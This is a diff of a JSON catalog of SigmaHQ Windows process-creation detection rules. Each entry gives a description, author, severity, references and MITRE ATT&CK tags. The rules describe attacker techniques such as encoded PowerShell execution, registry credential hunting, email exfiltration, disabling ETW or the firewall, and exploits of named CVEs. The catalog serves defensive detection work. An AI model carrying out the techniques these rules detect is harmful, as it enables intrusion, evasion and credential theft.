"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "value": "DumpStack.log Defender Evasion" + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe" }, { "description": "Detects email exfiltration via powershell cmdlets", @@ -37001,8 +31126,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" ], "tags": [ @@ -37013,1632 +31138,531 @@ "value": "Email Exifiltration Via Powershell" }, { - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "meta": { - "author": "frack113", - "creation_date": "2022/02/06", + "author": "Florian Roth", + "creation_date": "2019/01/16", "falsepositive": [ - "Legitimate commands in .lnk files" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "filename": "proc_creation_win_embed_exe_lnk.yml", + "filename": "proc_creation_win_susp_execution_path_webserver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.x86matthew.com/view_post?id=embed_exe_lnk", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "value": "Hidden Powershell in Link File Pattern" - }, - { - "description": "Detects a base64 encoded FromBase64String keyword in a process command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_encoded_frombase64string.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "value": "Encoded FromBase64String" - }, - { - "description": "Detects a base64 encoded IEX command string in a process command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_encoded_iex.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", - "value": "Encoded IEX" - }, - { - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", - "value": "Enumeration for 3rd Party Creds From CLI" - }, - { - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ] - }, - "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "value": "Enumeration for Credentials in Registry" - }, - { - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_esentutl_webcache.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ] - }, - "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "value": "Esentutl Steals Browser Information" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_etw_modification_cmdline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "41421f44-58f9-455d-838a-c398859841d4", - "value": "COMPlus_ETWEnabled Command Line Arguments" - }, - { - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "meta": { - "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/03/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_etw_trace_evasion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ] - }, - "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "value": "Disable of ETW Trace" - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_evil_winrm.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", - "https://github.com/Hackplayers/evil-winrm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "value": "WinRM Access with Evil-WinRM" - }, - { - "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", - "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" - }, - { - "description": "Execution of well known tools for data exfiltration and tunneling", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate Administrator using tools" - ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" - ] - }, - "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "value": "Exfiltration and Tunneling Tools Execution" - }, - { - "description": "Detects the use of various cli utility related to web request exfiltrating data", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_exfil_data_via_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", - "value": "Possible Exfiltration Of Data Via CLI" - }, - { - "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/30", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_expand_cabinet_files.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "9f107a84-532c-41af-b005-8d12a607639f", - "value": "Cabinet File Expansion" - }, - { - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "value": "Exploit for CVE-2015-1641" - }, - { - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/22", - "falsepositive": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" - ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", - "value": "Exploit for CVE-2017-0261" - }, - { - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "value": "Droppers Exploiting CVE-2017-11882" - }, - { - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", - "value": "Exploit for CVE-2017-8759" - }, - { - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/11/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" - ] - }, - "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "value": "Exploiting SetupComplete.cmd CVE-2019-1378" - }, - { - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", - "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "value": "Exploiting CVE-2019-1388" - }, - { - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/03/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" - ] - }, - "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", - "value": "Exploited CVE-2020-10189 Zoho ManageEngine" - }, - { - "description": "Detects new commands that add new printer port which point to suspicious file", - "meta": { - "author": "EagleEye Team, Florian Roth", - "creation_date": "2020/05/13", - "falsepositive": [ - "New printer port install on host" - ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" ], "tags": [ "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.t1505.003" ] }, - "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", - "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder" }, { - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/15", - "falsepositive": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" - ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", - "value": "DNS RCE CVE-2020-1350" - }, - { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" - }, - { - "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_systemnightmare.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/SystemNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "value": "SystemNightmare Exploitation Script Execution" - }, - { - "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", - "creation_date": "2021/12/20", + "creation_date": "2021/12/10", "falsepositive": [ - "Unknown" + "Network administrator computer" ], - "filename": "proc_creation_win_false_sysinternalsuite.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", - "value": "False Sysinternals Suite Tools" - }, - { - "description": "Detects a file or folder's permissions being modified or tampered with.", - "meta": { - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/10/23", - "falsepositive": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" - ], - "filename": "proc_creation_win_file_permission_modifications.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ] - }, - "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "value": "File or Folder Permissions Modifications" - }, - { - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "filename": "proc_creation_win_nmap_zenmap.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "value": "Findstr GPP Passwords" - }, - { - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "value": "Findstr LSASS" - }, - { - "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_recon_everyone.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", - "value": "Suspicious Recon Activity Using Findstr Keywords" - }, - { - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", - "value": "Windows Firewall Disabled via PowerShell" - }, - { - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/09/02", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_frp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://asec.ahnlab.com/en/38156/", - "https://github.com/fatedier/frp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", - "value": "Fast Reverse Proxy (FRP)" - }, - { - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2022/03/29", - "falsepositive": [ - "Certain software or administrative tasks may trigger false positives." - ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", - "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://nmap.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nmap_zenmap.yml" ], "tags": [ "attack.discovery", - "attack.t1120" + "attack.t1046" ] }, - "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "value": "Fsutil Drive Enumeration" + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Nmap/Zenmap Execution" }, { - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow 